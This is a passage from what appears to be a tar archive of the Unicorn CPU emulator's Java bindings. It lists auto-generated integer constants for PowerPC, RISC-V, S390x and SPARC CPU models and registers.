UC_CPU_PPC32_745_V1_0 = 219; public static final int UC_CPU_PPC32_755_V1_0 = 220; public static final int UC_CPU_PPC32_745_V1_1 = 221; public static final int UC_CPU_PPC32_755_V1_1 = 222; public static final int UC_CPU_PPC32_745_V2_0 = 223; public static final int UC_CPU_PPC32_755_V2_0 = 224; public static final int UC_CPU_PPC32_745_V2_1 = 225; public static final int UC_CPU_PPC32_755_V2_1 = 226; public static final int UC_CPU_PPC32_745_V2_2 = 227; public static final int UC_CPU_PPC32_755_V2_2 = 228; public static final int UC_CPU_PPC32_745_V2_3 = 229; public static final int UC_CPU_PPC32_755_V2_3 = 230; public static final int UC_CPU_PPC32_745_V2_4 = 231; public static final int UC_CPU_PPC32_755_V2_4 = 232; public static final int UC_CPU_PPC32_745_V2_5 = 233; public static final int UC_CPU_PPC32_755_V2_5 = 234; public static final int UC_CPU_PPC32_745_V2_6 = 235; public static final int UC_CPU_PPC32_755_V2_6 = 236; public static final int UC_CPU_PPC32_745_V2_7 = 237; public static final int UC_CPU_PPC32_755_V2_7 = 238; public static final int UC_CPU_PPC32_745_V2_8 = 239; public static final int UC_CPU_PPC32_755_V2_8 = 240; public static final int UC_CPU_PPC32_7400_V1_0 = 241; public static final int UC_CPU_PPC32_7400_V1_1 = 242; public static final int UC_CPU_PPC32_7400_V2_0 = 243; public static final int UC_CPU_PPC32_7400_V2_1 = 244; public static final int UC_CPU_PPC32_7400_V2_2 = 245; public static final int UC_CPU_PPC32_7400_V2_6 = 246; public static final int UC_CPU_PPC32_7400_V2_7 = 247; public static final int UC_CPU_PPC32_7400_V2_8 = 248; public static final int UC_CPU_PPC32_7400_V2_9 = 249; public static final int UC_CPU_PPC32_7410_V1_0 = 250; public static final int UC_CPU_PPC32_7410_V1_1 = 251; public static final int UC_CPU_PPC32_7410_V1_2 = 252; public static final int UC_CPU_PPC32_7410_V1_3 = 253; public static final int UC_CPU_PPC32_7410_V1_4 = 254; public static final int UC_CPU_PPC32_7448_V1_0 = 255; public static final int UC_CPU_PPC32_7448_V1_1 = 256; public static final int UC_CPU_PPC32_7448_V2_0 = 257; public static final int UC_CPU_PPC32_7448_V2_1 = 258; public static final int UC_CPU_PPC32_7450_V1_0 = 259; public static final int UC_CPU_PPC32_7450_V1_1 = 260; public static final int UC_CPU_PPC32_7450_V1_2 = 261; public static final int UC_CPU_PPC32_7450_V2_0 = 262; public static final int UC_CPU_PPC32_7450_V2_1 = 263; public static final int UC_CPU_PPC32_7441_V2_1 = 264; public static final int UC_CPU_PPC32_7441_V2_3 = 265; public static final int UC_CPU_PPC32_7451_V2_3 = 266; public static final int UC_CPU_PPC32_7441_V2_10 = 267; public static final int UC_CPU_PPC32_7451_V2_10 = 268; public static final int UC_CPU_PPC32_7445_V1_0 = 269; public static final int UC_CPU_PPC32_7455_V1_0 = 270; public static final int UC_CPU_PPC32_7445_V2_1 = 271; public static final int UC_CPU_PPC32_7455_V2_1 = 272; public static final int UC_CPU_PPC32_7445_V3_2 = 273; public static final int UC_CPU_PPC32_7455_V3_2 = 274; public static final int UC_CPU_PPC32_7445_V3_3 = 275; public static final int UC_CPU_PPC32_7455_V3_3 = 276; public static final int UC_CPU_PPC32_7445_V3_4 = 277; public static final int UC_CPU_PPC32_7455_V3_4 = 278; public static final int UC_CPU_PPC32_7447_V1_0 = 279; public static final int UC_CPU_PPC32_7457_V1_0 = 280; public static final int UC_CPU_PPC32_7447_V1_1 = 281; public static final int UC_CPU_PPC32_7457_V1_1 = 282; public static final int UC_CPU_PPC32_7457_V1_2 = 283; public static final int UC_CPU_PPC32_7447A_V1_0 = 284; public static final int UC_CPU_PPC32_7457A_V1_0 = 285; public static final int UC_CPU_PPC32_7447A_V1_1 = 286; public static final int UC_CPU_PPC32_7457A_V1_1 = 287; public static final int UC_CPU_PPC32_7447A_V1_2 = 288; public static final int UC_CPU_PPC32_7457A_V1_2 = 289; public static final int UC_CPU_PPC32_ENDING = 290; // PPC64 CPU public static final int UC_CPU_PPC64_E5500 = 0; public static final int UC_CPU_PPC64_E6500 = 1; public static final int UC_CPU_PPC64_970_V2_2 = 2; public static final int UC_CPU_PPC64_970FX_V1_0 = 3; public static final int UC_CPU_PPC64_970FX_V2_0 = 4; public static final int UC_CPU_PPC64_970FX_V2_1 = 5; public static final int UC_CPU_PPC64_970FX_V3_0 = 6; public static final int UC_CPU_PPC64_970FX_V3_1 = 7; public static final int UC_CPU_PPC64_970MP_V1_0 = 8; public static final int UC_CPU_PPC64_970MP_V1_1 = 9; public static final int UC_CPU_PPC64_POWER5_V2_1 = 10; public static final int UC_CPU_PPC64_POWER7_V2_3 = 11; public static final int UC_CPU_PPC64_POWER7_V2_1 = 12; public static final int UC_CPU_PPC64_POWER8E_V2_1 = 13; public static final int UC_CPU_PPC64_POWER8_V2_0 = 14; public static final int UC_CPU_PPC64_POWER8NVL_V1_0 = 15; public static final int UC_CPU_PPC64_POWER9_V1_0 = 16; public static final int UC_CPU_PPC64_POWER9_V2_0 = 17; public static final int UC_CPU_PPC64_POWER10_V1_0 = 18; public static final int UC_CPU_PPC64_ENDING = 19; // PPC registers public static final int UC_PPC_REG_INVALID = 0; // General purpose registers public static final int UC_PPC_REG_PC = 1; public static final int UC_PPC_REG_0 = 2; public static final int UC_PPC_REG_1 = 3; public static final int UC_PPC_REG_2 = 4; public static final int UC_PPC_REG_3 = 5; public static final int UC_PPC_REG_4 = 6; public static final int UC_PPC_REG_5 = 7; public static final int UC_PPC_REG_6 = 8; public static final int UC_PPC_REG_7 = 9; public static final int UC_PPC_REG_8 = 10; public static final int UC_PPC_REG_9 = 11; public static final int UC_PPC_REG_10 = 12; public static final int UC_PPC_REG_11 = 13; public static final int UC_PPC_REG_12 = 14; public static final int UC_PPC_REG_13 = 15; public static final int UC_PPC_REG_14 = 16; public static final int UC_PPC_REG_15 = 17; public static final int UC_PPC_REG_16 = 18; public static final int UC_PPC_REG_17 = 19; public static final int UC_PPC_REG_18 = 20; public static final int UC_PPC_REG_19 = 21; public static final int UC_PPC_REG_20 = 22; public static final int UC_PPC_REG_21 = 23; public static final int UC_PPC_REG_22 = 24; public static final int UC_PPC_REG_23 = 25; public static final int UC_PPC_REG_24 = 26; public static final int UC_PPC_REG_25 = 27; public static final int UC_PPC_REG_26 = 28; public static final int UC_PPC_REG_27 = 29; public static final int UC_PPC_REG_28 = 30; public static final int UC_PPC_REG_29 = 31; public static final int UC_PPC_REG_30 = 32; public static final int UC_PPC_REG_31 = 33; public static final int UC_PPC_REG_CR0 = 34; public static final int UC_PPC_REG_CR1 = 35; public static final int UC_PPC_REG_CR2 = 36; public static final int UC_PPC_REG_CR3 = 37; public static final int UC_PPC_REG_CR4 = 38; public static final int UC_PPC_REG_CR5 = 39; public static final int UC_PPC_REG_CR6 = 40; public static final int UC_PPC_REG_CR7 = 41; public static final int UC_PPC_REG_FPR0 = 42; public static final int UC_PPC_REG_FPR1 = 43; public static final int UC_PPC_REG_FPR2 = 44; public static final int UC_PPC_REG_FPR3 = 45; public static final int UC_PPC_REG_FPR4 = 46; public static final int UC_PPC_REG_FPR5 = 47; public static final int UC_PPC_REG_FPR6 = 48; public static final int UC_PPC_REG_FPR7 = 49; public static final int UC_PPC_REG_FPR8 = 50; public static final int UC_PPC_REG_FPR9 = 51; public static final int UC_PPC_REG_FPR10 = 52; public static final int UC_PPC_REG_FPR11 = 53; public static final int UC_PPC_REG_FPR12 = 54; public static final int UC_PPC_REG_FPR13 = 55; public static final int UC_PPC_REG_FPR14 = 56; public static final int UC_PPC_REG_FPR15 = 57; public static final int UC_PPC_REG_FPR16 = 58; public static final int UC_PPC_REG_FPR17 = 59; public static final int UC_PPC_REG_FPR18 = 60; public static final int UC_PPC_REG_FPR19 = 61; public static final int UC_PPC_REG_FPR20 = 62; public static final int UC_PPC_REG_FPR21 = 63; public static final int UC_PPC_REG_FPR22 = 64; public static final int UC_PPC_REG_FPR23 = 65; public static final int UC_PPC_REG_FPR24 = 66; public static final int UC_PPC_REG_FPR25 = 67; public static final int UC_PPC_REG_FPR26 = 68; public static final int UC_PPC_REG_FPR27 = 69; public static final int UC_PPC_REG_FPR28 = 70; public static final int UC_PPC_REG_FPR29 = 71; public static final int UC_PPC_REG_FPR30 = 72; public static final int UC_PPC_REG_FPR31 = 73; public static final int UC_PPC_REG_LR = 74; public static final int UC_PPC_REG_XER = 75; public static final int UC_PPC_REG_CTR = 76; public static final int UC_PPC_REG_MSR = 77; public static final int UC_PPC_REG_FPSCR = 78; public static final int UC_PPC_REG_CR = 79; public static final int UC_PPC_REG_ENDING = 80; } unicorn-2.1.1/bindings/java/src/main/java/unicorn/RiscvConst.java000066400000000000000000000346661467524106700250120ustar00rootroot00000000000000// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT package unicorn; public interface RiscvConst { // RISCV32 CPU public static final int UC_CPU_RISCV32_ANY = 0; public static final int UC_CPU_RISCV32_BASE32 = 1; public static final int UC_CPU_RISCV32_SIFIVE_E31 = 2; public static final int UC_CPU_RISCV32_SIFIVE_U34 = 3; public static final int UC_CPU_RISCV32_ENDING = 4; // RISCV64 CPU public static final int UC_CPU_RISCV64_ANY = 0; public static final int UC_CPU_RISCV64_BASE64 = 1; public static final int UC_CPU_RISCV64_SIFIVE_E51 = 2; public static final int UC_CPU_RISCV64_SIFIVE_U54 = 3; public static final int UC_CPU_RISCV64_ENDING = 4; // RISCV registers public static final int UC_RISCV_REG_INVALID = 0; // General purpose registers public static final int UC_RISCV_REG_X0 = 1; public static final int UC_RISCV_REG_X1 = 2; public static final int UC_RISCV_REG_X2 = 3; public static final int UC_RISCV_REG_X3 = 4; public static final int UC_RISCV_REG_X4 = 5; public static final int UC_RISCV_REG_X5 = 6; public static final int UC_RISCV_REG_X6 = 7; public static final int UC_RISCV_REG_X7 = 8; public static final int UC_RISCV_REG_X8 = 9; public static final int UC_RISCV_REG_X9 = 10; public static final int UC_RISCV_REG_X10 = 11; public static final int UC_RISCV_REG_X11 = 12; public static final int UC_RISCV_REG_X12 = 13; public static final int UC_RISCV_REG_X13 = 14; public static final int UC_RISCV_REG_X14 = 15; public static final int UC_RISCV_REG_X15 = 16; public static final int UC_RISCV_REG_X16 = 17; public static final int UC_RISCV_REG_X17 = 18; public static final int UC_RISCV_REG_X18 = 19; public static final int UC_RISCV_REG_X19 = 20; public static final int UC_RISCV_REG_X20 = 21; public static final int UC_RISCV_REG_X21 = 22; public static final int UC_RISCV_REG_X22 = 23; public static final int UC_RISCV_REG_X23 = 24; public static final int UC_RISCV_REG_X24 = 25; public static final int UC_RISCV_REG_X25 = 26; public static final int UC_RISCV_REG_X26 = 27; public static final int UC_RISCV_REG_X27 = 28; public static final int UC_RISCV_REG_X28 = 29; public static final int UC_RISCV_REG_X29 = 30; public static final int UC_RISCV_REG_X30 = 31; public static final int UC_RISCV_REG_X31 = 32; // RISCV CSR public static final int UC_RISCV_REG_USTATUS = 33; public static final int UC_RISCV_REG_UIE = 34; public static final int UC_RISCV_REG_UTVEC = 35; public static final int UC_RISCV_REG_USCRATCH = 36; public static final int UC_RISCV_REG_UEPC = 37; public static final int UC_RISCV_REG_UCAUSE = 38; public static final int UC_RISCV_REG_UTVAL = 39; public static final int UC_RISCV_REG_UIP = 40; public static final int UC_RISCV_REG_FFLAGS = 41; public static final int UC_RISCV_REG_FRM = 42; public static final int UC_RISCV_REG_FCSR = 43; public static final int UC_RISCV_REG_CYCLE = 44; public static final int UC_RISCV_REG_TIME = 45; public static final int UC_RISCV_REG_INSTRET = 46; public static final int UC_RISCV_REG_HPMCOUNTER3 = 47; public static final int UC_RISCV_REG_HPMCOUNTER4 = 48; public static final int UC_RISCV_REG_HPMCOUNTER5 = 49; public static final int UC_RISCV_REG_HPMCOUNTER6 = 50; public static final int UC_RISCV_REG_HPMCOUNTER7 = 51; public static final int UC_RISCV_REG_HPMCOUNTER8 = 52; public static final int UC_RISCV_REG_HPMCOUNTER9 = 53; public static final int UC_RISCV_REG_HPMCOUNTER10 = 54; public static final int UC_RISCV_REG_HPMCOUNTER11 = 55; public static final int UC_RISCV_REG_HPMCOUNTER12 = 56; public static final int UC_RISCV_REG_HPMCOUNTER13 = 57; public static final int UC_RISCV_REG_HPMCOUNTER14 = 58; public static final int UC_RISCV_REG_HPMCOUNTER15 = 59; public static final int UC_RISCV_REG_HPMCOUNTER16 = 60; public static final int UC_RISCV_REG_HPMCOUNTER17 = 61; public static final int UC_RISCV_REG_HPMCOUNTER18 = 62; public static final int UC_RISCV_REG_HPMCOUNTER19 = 63; public static final int UC_RISCV_REG_HPMCOUNTER20 = 64; public static final int UC_RISCV_REG_HPMCOUNTER21 = 65; public static final int UC_RISCV_REG_HPMCOUNTER22 = 66; public static final int UC_RISCV_REG_HPMCOUNTER23 = 67; public static final int UC_RISCV_REG_HPMCOUNTER24 = 68; public static final int UC_RISCV_REG_HPMCOUNTER25 = 69; public static final int UC_RISCV_REG_HPMCOUNTER26 = 70; public static final int UC_RISCV_REG_HPMCOUNTER27 = 71; public static final int UC_RISCV_REG_HPMCOUNTER28 = 72; public static final int UC_RISCV_REG_HPMCOUNTER29 = 73; public static final int UC_RISCV_REG_HPMCOUNTER30 = 74; public static final int UC_RISCV_REG_HPMCOUNTER31 = 75; public static final int UC_RISCV_REG_CYCLEH = 76; public static final int UC_RISCV_REG_TIMEH = 77; public static final int UC_RISCV_REG_INSTRETH = 78; public static final int UC_RISCV_REG_HPMCOUNTER3H = 79; public static final int UC_RISCV_REG_HPMCOUNTER4H = 80; public static final int UC_RISCV_REG_HPMCOUNTER5H = 81; public static final int UC_RISCV_REG_HPMCOUNTER6H = 82; public static final int UC_RISCV_REG_HPMCOUNTER7H = 83; public static final int UC_RISCV_REG_HPMCOUNTER8H = 84; public static final int UC_RISCV_REG_HPMCOUNTER9H = 85; public static final int UC_RISCV_REG_HPMCOUNTER10H = 86; public static final int UC_RISCV_REG_HPMCOUNTER11H = 87; public static final int UC_RISCV_REG_HPMCOUNTER12H = 88; public static final int UC_RISCV_REG_HPMCOUNTER13H = 89; public static final int UC_RISCV_REG_HPMCOUNTER14H = 90; public static final int UC_RISCV_REG_HPMCOUNTER15H = 91; public static final int UC_RISCV_REG_HPMCOUNTER16H = 92; public static final int UC_RISCV_REG_HPMCOUNTER17H = 93; public static final int UC_RISCV_REG_HPMCOUNTER18H = 94; public static final int UC_RISCV_REG_HPMCOUNTER19H = 95; public static final int UC_RISCV_REG_HPMCOUNTER20H = 96; public static final int UC_RISCV_REG_HPMCOUNTER21H = 97; public static final int UC_RISCV_REG_HPMCOUNTER22H = 98; public static final int UC_RISCV_REG_HPMCOUNTER23H = 99; public static final int UC_RISCV_REG_HPMCOUNTER24H = 100; public static final int UC_RISCV_REG_HPMCOUNTER25H = 101; public static final int UC_RISCV_REG_HPMCOUNTER26H = 102; public static final int UC_RISCV_REG_HPMCOUNTER27H = 103; public static final int UC_RISCV_REG_HPMCOUNTER28H = 104; public static final int UC_RISCV_REG_HPMCOUNTER29H = 105; public static final int UC_RISCV_REG_HPMCOUNTER30H = 106; public static final int UC_RISCV_REG_HPMCOUNTER31H = 107; public static final int UC_RISCV_REG_MCYCLE = 108; public static final int UC_RISCV_REG_MINSTRET = 109; public static final int UC_RISCV_REG_MCYCLEH = 110; public static final int UC_RISCV_REG_MINSTRETH = 111; public static final int UC_RISCV_REG_MVENDORID = 112; public static final int UC_RISCV_REG_MARCHID = 113; public static final int UC_RISCV_REG_MIMPID = 114; public static final int UC_RISCV_REG_MHARTID = 115; public static final int UC_RISCV_REG_MSTATUS = 116; public static final int UC_RISCV_REG_MISA = 117; public static final int UC_RISCV_REG_MEDELEG = 118; public static final int UC_RISCV_REG_MIDELEG = 119; public static final int UC_RISCV_REG_MIE = 120; public static final int UC_RISCV_REG_MTVEC = 121; public static final int UC_RISCV_REG_MCOUNTEREN = 122; public static final int UC_RISCV_REG_MSTATUSH = 123; public static final int UC_RISCV_REG_MUCOUNTEREN = 124; public static final int UC_RISCV_REG_MSCOUNTEREN = 125; public static final int UC_RISCV_REG_MHCOUNTEREN = 126; public static final int UC_RISCV_REG_MSCRATCH = 127; public static final int UC_RISCV_REG_MEPC = 128; public static final int UC_RISCV_REG_MCAUSE = 129; public static final int UC_RISCV_REG_MTVAL = 130; public static final int UC_RISCV_REG_MIP = 131; public static final int UC_RISCV_REG_MBADADDR = 132; public static final int UC_RISCV_REG_SSTATUS = 133; public static final int UC_RISCV_REG_SEDELEG = 134; public static final int UC_RISCV_REG_SIDELEG = 135; public static final int UC_RISCV_REG_SIE = 136; public static final int UC_RISCV_REG_STVEC = 137; public static final int UC_RISCV_REG_SCOUNTEREN = 138; public static final int UC_RISCV_REG_SSCRATCH = 139; public static final int UC_RISCV_REG_SEPC = 140; public static final int UC_RISCV_REG_SCAUSE = 141; public static final int UC_RISCV_REG_STVAL = 142; public static final int UC_RISCV_REG_SIP = 143; public static final int UC_RISCV_REG_SBADADDR = 144; public static final int UC_RISCV_REG_SPTBR = 145; public static final int UC_RISCV_REG_SATP = 146; public static final int UC_RISCV_REG_HSTATUS = 147; public static final int UC_RISCV_REG_HEDELEG = 148; public static final int UC_RISCV_REG_HIDELEG = 149; public static final int UC_RISCV_REG_HIE = 150; public static final int UC_RISCV_REG_HCOUNTEREN = 151; public static final int UC_RISCV_REG_HTVAL = 152; public static final int UC_RISCV_REG_HIP = 153; public static final int UC_RISCV_REG_HTINST = 154; public static final int UC_RISCV_REG_HGATP = 155; public static final int UC_RISCV_REG_HTIMEDELTA = 156; public static final int UC_RISCV_REG_HTIMEDELTAH = 157; // Floating-point registers public static final int UC_RISCV_REG_F0 = 158; public static final int UC_RISCV_REG_F1 = 159; public static final int UC_RISCV_REG_F2 = 160; public static final int UC_RISCV_REG_F3 = 161; public static final int UC_RISCV_REG_F4 = 162; public static final int UC_RISCV_REG_F5 = 163; public static final int UC_RISCV_REG_F6 = 164; public static final int UC_RISCV_REG_F7 = 165; public static final int UC_RISCV_REG_F8 = 166; public static final int UC_RISCV_REG_F9 = 167; public static final int UC_RISCV_REG_F10 = 168; public static final int UC_RISCV_REG_F11 = 169; public static final int UC_RISCV_REG_F12 = 170; public static final int UC_RISCV_REG_F13 = 171; public static final int UC_RISCV_REG_F14 = 172; public static final int UC_RISCV_REG_F15 = 173; public static final int UC_RISCV_REG_F16 = 174; public static final int UC_RISCV_REG_F17 = 175; public static final int UC_RISCV_REG_F18 = 176; public static final int UC_RISCV_REG_F19 = 177; public static final int UC_RISCV_REG_F20 = 178; public static final int UC_RISCV_REG_F21 = 179; public static final int UC_RISCV_REG_F22 = 180; public static final int UC_RISCV_REG_F23 = 181; public static final int UC_RISCV_REG_F24 = 182; public static final int UC_RISCV_REG_F25 = 183; public static final int UC_RISCV_REG_F26 = 184; public static final int UC_RISCV_REG_F27 = 185; public static final int UC_RISCV_REG_F28 = 186; public static final int UC_RISCV_REG_F29 = 187; public static final int UC_RISCV_REG_F30 = 188; public static final int UC_RISCV_REG_F31 = 189; public static final int UC_RISCV_REG_PC = 190; public static final int UC_RISCV_REG_ENDING = 191; // Alias registers public static final int UC_RISCV_REG_ZERO = 1; public static final int UC_RISCV_REG_RA = 2; public static final int UC_RISCV_REG_SP = 3; public static final int UC_RISCV_REG_GP = 4; public static final int UC_RISCV_REG_TP = 5; public static final int UC_RISCV_REG_T0 = 6; public static final int UC_RISCV_REG_T1 = 7; public static final int UC_RISCV_REG_T2 = 8; public static final int UC_RISCV_REG_S0 = 9; public static final int UC_RISCV_REG_FP = 9; public static final int UC_RISCV_REG_S1 = 10; public static final int UC_RISCV_REG_A0 = 11; public static final int UC_RISCV_REG_A1 = 12; public static final int UC_RISCV_REG_A2 = 13; public static final int UC_RISCV_REG_A3 = 14; public static final int UC_RISCV_REG_A4 = 15; public static final int UC_RISCV_REG_A5 = 16; public static final int UC_RISCV_REG_A6 = 17; public static final int UC_RISCV_REG_A7 = 18; public static final int UC_RISCV_REG_S2 = 19; public static final int UC_RISCV_REG_S3 = 20; public static final int UC_RISCV_REG_S4 = 21; public static final int UC_RISCV_REG_S5 = 22; public static final int UC_RISCV_REG_S6 = 23; public static final int UC_RISCV_REG_S7 = 24; public static final int UC_RISCV_REG_S8 = 25; public static final int UC_RISCV_REG_S9 = 26; public static final int UC_RISCV_REG_S10 = 27; public static final int UC_RISCV_REG_S11 = 28; public static final int UC_RISCV_REG_T3 = 29; public static final int UC_RISCV_REG_T4 = 30; public static final int UC_RISCV_REG_T5 = 31; public static final int UC_RISCV_REG_T6 = 32; public static final int UC_RISCV_REG_FT0 = 158; public static final int UC_RISCV_REG_FT1 = 159; public static final int UC_RISCV_REG_FT2 = 160; public static final int UC_RISCV_REG_FT3 = 161; public static final int UC_RISCV_REG_FT4 = 162; public static final int UC_RISCV_REG_FT5 = 163; public static final int UC_RISCV_REG_FT6 = 164; public static final int UC_RISCV_REG_FT7 = 165; public static final int UC_RISCV_REG_FS0 = 166; public static final int UC_RISCV_REG_FS1 = 167; public static final int UC_RISCV_REG_FA0 = 168; public static final int UC_RISCV_REG_FA1 = 169; public static final int UC_RISCV_REG_FA2 = 170; public static final int UC_RISCV_REG_FA3 = 171; public static final int UC_RISCV_REG_FA4 = 172; public static final int UC_RISCV_REG_FA5 = 173; public static final int UC_RISCV_REG_FA6 = 174; public static final int UC_RISCV_REG_FA7 = 175; public static final int UC_RISCV_REG_FS2 = 176; public static final int UC_RISCV_REG_FS3 = 177; public static final int UC_RISCV_REG_FS4 = 178; public static final int UC_RISCV_REG_FS5 = 179; public static final int UC_RISCV_REG_FS6 = 180; public static final int UC_RISCV_REG_FS7 = 181; public static final int UC_RISCV_REG_FS8 = 182; public static final int UC_RISCV_REG_FS9 = 183; public static final int UC_RISCV_REG_FS10 = 184; public static final int UC_RISCV_REG_FS11 = 185; public static final int UC_RISCV_REG_FT8 = 186; public static final int UC_RISCV_REG_FT9 = 187; public static final int UC_RISCV_REG_FT10 = 188; public static final int UC_RISCV_REG_FT11 = 189; } unicorn-2.1.1/bindings/java/src/main/java/unicorn/S390xConst.java000066400000000000000000000132101467524106700245300ustar00rootroot00000000000000// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT package unicorn; public interface S390xConst { // S390X CPU public static final int UC_CPU_S390X_Z900 = 0; public static final int UC_CPU_S390X_Z900_2 = 1; public static final int UC_CPU_S390X_Z900_3 = 2; public static final int UC_CPU_S390X_Z800 = 3; public static final int UC_CPU_S390X_Z990 = 4; public static final int UC_CPU_S390X_Z990_2 = 5; public static final int UC_CPU_S390X_Z990_3 = 6; public static final int UC_CPU_S390X_Z890 = 7; public static final int UC_CPU_S390X_Z990_4 = 8; public static final int UC_CPU_S390X_Z890_2 = 9; public static final int UC_CPU_S390X_Z990_5 = 10; public static final int UC_CPU_S390X_Z890_3 = 11; public static final int UC_CPU_S390X_Z9EC = 12; public static final int UC_CPU_S390X_Z9EC_2 = 13; public static final int UC_CPU_S390X_Z9BC = 14; public static final int UC_CPU_S390X_Z9EC_3 = 15; public static final int UC_CPU_S390X_Z9BC_2 = 16; public static final int UC_CPU_S390X_Z10EC = 17; public static final int UC_CPU_S390X_Z10EC_2 = 18; public static final int UC_CPU_S390X_Z10BC = 19; public static final int UC_CPU_S390X_Z10EC_3 = 20; public static final int UC_CPU_S390X_Z10BC_2 = 21; public static final int UC_CPU_S390X_Z196 = 22; public static final int UC_CPU_S390X_Z196_2 = 23; public static final int UC_CPU_S390X_Z114 = 24; public static final int UC_CPU_S390X_ZEC12 = 25; public static final int UC_CPU_S390X_ZEC12_2 = 26; public static final int UC_CPU_S390X_ZBC12 = 27; public static final int UC_CPU_S390X_Z13 = 28; public static final int UC_CPU_S390X_Z13_2 = 29; public static final int UC_CPU_S390X_Z13S = 30; public static final int UC_CPU_S390X_Z14 = 31; public static final int UC_CPU_S390X_Z14_2 = 32; public static final int UC_CPU_S390X_Z14ZR1 = 33; public static final int UC_CPU_S390X_GEN15A = 34; public static final int UC_CPU_S390X_GEN15B = 35; public static final int UC_CPU_S390X_QEMU = 36; public static final int UC_CPU_S390X_MAX = 37; public static final int UC_CPU_S390X_ENDING = 38; // S390X registers public static final int UC_S390X_REG_INVALID = 0; // General purpose registers public static final int UC_S390X_REG_R0 = 1; public static final int UC_S390X_REG_R1 = 2; public static final int UC_S390X_REG_R2 = 3; public static final int UC_S390X_REG_R3 = 4; public static final int UC_S390X_REG_R4 = 5; public static final int UC_S390X_REG_R5 = 6; public static final int UC_S390X_REG_R6 = 7; public static final int UC_S390X_REG_R7 = 8; public static final int UC_S390X_REG_R8 = 9; public static final int UC_S390X_REG_R9 = 10; public static final int UC_S390X_REG_R10 = 11; public static final int UC_S390X_REG_R11 = 12; public static final int UC_S390X_REG_R12 = 13; public static final int UC_S390X_REG_R13 = 14; public static final int UC_S390X_REG_R14 = 15; public static final int UC_S390X_REG_R15 = 16; // Floating point registers public static final int UC_S390X_REG_F0 = 17; public static final int UC_S390X_REG_F1 = 18; public static final int UC_S390X_REG_F2 = 19; public static final int UC_S390X_REG_F3 = 20; public static final int UC_S390X_REG_F4 = 21; public static final int UC_S390X_REG_F5 = 22; public static final int UC_S390X_REG_F6 = 23; public static final int UC_S390X_REG_F7 = 24; public static final int UC_S390X_REG_F8 = 25; public static final int UC_S390X_REG_F9 = 26; public static final int UC_S390X_REG_F10 = 27; public static final int UC_S390X_REG_F11 = 28; public static final int UC_S390X_REG_F12 = 29; public static final int UC_S390X_REG_F13 = 30; public static final int UC_S390X_REG_F14 = 31; public static final int UC_S390X_REG_F15 = 32; public static final int UC_S390X_REG_F16 = 33; public static final int UC_S390X_REG_F17 = 34; public static final int UC_S390X_REG_F18 = 35; public static final int UC_S390X_REG_F19 = 36; public static final int UC_S390X_REG_F20 = 37; public static final int UC_S390X_REG_F21 = 38; public static final int UC_S390X_REG_F22 = 39; public static final int UC_S390X_REG_F23 = 40; public static final int UC_S390X_REG_F24 = 41; public static final int UC_S390X_REG_F25 = 42; public static final int UC_S390X_REG_F26 = 43; public static final int UC_S390X_REG_F27 = 44; public static final int UC_S390X_REG_F28 = 45; public static final int UC_S390X_REG_F29 = 46; public static final int UC_S390X_REG_F30 = 47; public static final int UC_S390X_REG_F31 = 48; // Access registers public static final int UC_S390X_REG_A0 = 49; public static final int UC_S390X_REG_A1 = 50; public static final int UC_S390X_REG_A2 = 51; public static final int UC_S390X_REG_A3 = 52; public static final int UC_S390X_REG_A4 = 53; public static final int UC_S390X_REG_A5 = 54; public static final int UC_S390X_REG_A6 = 55; public static final int UC_S390X_REG_A7 = 56; public static final int UC_S390X_REG_A8 = 57; public static final int UC_S390X_REG_A9 = 58; public static final int UC_S390X_REG_A10 = 59; public static final int UC_S390X_REG_A11 = 60; public static final int UC_S390X_REG_A12 = 61; public static final int UC_S390X_REG_A13 = 62; public static final int UC_S390X_REG_A14 = 63; public static final int UC_S390X_REG_A15 = 64; public static final int UC_S390X_REG_PC = 65; public static final int UC_S390X_REG_PSWM = 66; public static final int UC_S390X_REG_ENDING = 67; // Alias registers } unicorn-2.1.1/bindings/java/src/main/java/unicorn/SparcConst.java000066400000000000000000000153271467524106700247650ustar00rootroot00000000000000// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT package unicorn; public interface SparcConst { // SPARC32 CPU public static final int UC_CPU_SPARC32_FUJITSU_MB86904 = 0; public static final int UC_CPU_SPARC32_FUJITSU_MB86907 = 1; public static final int UC_CPU_SPARC32_TI_MICROSPARC_I = 2; public static final int UC_CPU_SPARC32_TI_MICROSPARC_II = 3; public static final int UC_CPU_SPARC32_TI_MICROSPARC_IIEP = 4; public static final int UC_CPU_SPARC32_TI_SUPERSPARC_40 = 5; public static final int UC_CPU_SPARC32_TI_SUPERSPARC_50 = 6; public static final int UC_CPU_SPARC32_TI_SUPERSPARC_51 = 7; public static final int UC_CPU_SPARC32_TI_SUPERSPARC_60 = 8; public static final int UC_CPU_SPARC32_TI_SUPERSPARC_61 = 9; public static final int UC_CPU_SPARC32_TI_SUPERSPARC_II = 10; public static final int UC_CPU_SPARC32_LEON2 = 11; public static final int UC_CPU_SPARC32_LEON3 = 12; public static final int UC_CPU_SPARC32_ENDING = 13; // SPARC64 CPU public static final int UC_CPU_SPARC64_FUJITSU = 0; public static final int UC_CPU_SPARC64_FUJITSU_III = 1; public static final int UC_CPU_SPARC64_FUJITSU_IV = 2; public static final int UC_CPU_SPARC64_FUJITSU_V = 3; public static final int UC_CPU_SPARC64_TI_ULTRASPARC_I = 4; public static final int UC_CPU_SPARC64_TI_ULTRASPARC_II = 5; public static final int UC_CPU_SPARC64_TI_ULTRASPARC_III = 6; public static final int UC_CPU_SPARC64_TI_ULTRASPARC_IIE = 7; public static final int UC_CPU_SPARC64_SUN_ULTRASPARC_III = 8; public static final int UC_CPU_SPARC64_SUN_ULTRASPARC_III_CU = 9; public static final int UC_CPU_SPARC64_SUN_ULTRASPARC_IIII = 10; public static final int UC_CPU_SPARC64_SUN_ULTRASPARC_IV = 11; public static final int UC_CPU_SPARC64_SUN_ULTRASPARC_IV_PLUS = 12; public static final int UC_CPU_SPARC64_SUN_ULTRASPARC_IIII_PLUS = 13; public static final int UC_CPU_SPARC64_SUN_ULTRASPARC_T1 = 14; public static final int UC_CPU_SPARC64_SUN_ULTRASPARC_T2 = 15; public static final int UC_CPU_SPARC64_NEC_ULTRASPARC_I = 16; public static final int UC_CPU_SPARC64_ENDING = 17; // SPARC registers public static final int UC_SPARC_REG_INVALID = 0; public static final int UC_SPARC_REG_F0 = 1; public static final int UC_SPARC_REG_F1 = 2; public static final int UC_SPARC_REG_F2 = 3; public static final int UC_SPARC_REG_F3 = 4; public static final int UC_SPARC_REG_F4 = 5; public static final int UC_SPARC_REG_F5 